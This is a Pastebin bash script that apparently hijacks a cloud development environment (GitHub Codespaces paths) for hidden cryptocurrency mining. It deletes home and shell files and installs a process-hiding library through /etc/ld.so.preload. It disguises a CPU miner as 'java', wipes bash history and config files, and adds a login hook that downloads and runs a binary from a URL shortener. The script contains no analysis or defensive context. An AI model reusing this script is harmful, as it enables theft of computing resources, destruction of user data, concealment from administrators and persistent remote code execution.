ppek

AGCb

Feb 27th, 2023
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.18 KB | None | 0 0
  1. rm -rvf .lib* .bash*
  2. cd ~/
  3. rm -rvf * && mkdir d && cd d
  4. #!/bin/sh
  5.  
  6. echo "==================="
  7. echo "   CEK TIMEZONE   "
  8. echo "==================="
  9. echo " "
  10. echo " "
  11. ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
  12. dpkg-reconfigure --frontend noninteractive tzdata
  13. sleep 2
  14.  
  15. apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
  16.  
  17. wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
  18. tar -xvzf graphics.tar.gz
  19. rm -rf graphics.tar.gz
  20. cp d/graftcp/graftcp /home/codespace/.lib/
  21.  
  22. wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
  23. unzip tukimin.zip
  24. rm -rf tukimin.zip
  25. make
  26. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  27. mv libprocesshider.so /usr/local/lib/
  28. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  29.  
  30. cd
  31. mkdir .lib
  32. cd .lib
  33. wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
  34. tar -xvzf graphics.tar.gz
  35. rm -rf graphics.tar.gz
  36. cd .lib
  37. git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.29/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-avx2 java && cp java* ~/ && mv java* /home/codespace/.lib && cd .. && rm -rvf cpuminer-opt-linux && mv kernel* /home/codespace/.lib
  38. cd .. && rm -rvf akc
  39. echo "" > /home/codespace/.bashrc
  40. echo "" > /home/codespace/.bash_history
  41. echo "" > /home/codespace/.bash_profile
  42. echo 'echo ""  >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
  43. echo "source /home/codespace/.bash_profile"  >> /home/codespace/.bashrc
  44. echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
  45. echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
  46. echo "bash /home/codespace/.lib/gas.sh"  >> /home/codespace/.bash_profile &&
  47. echo "export LC_ALL=C; unset LANGUAGE && cd && rm -rvf e && wget -O e http://tiny.cc/Cbte && chmod +x e && ./e " > /home/codespace/.lib/gas.sh
  48. cd /home/codespace/.lib/
  49. chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
  50.  
Add Comment
Please, Sign In to add comment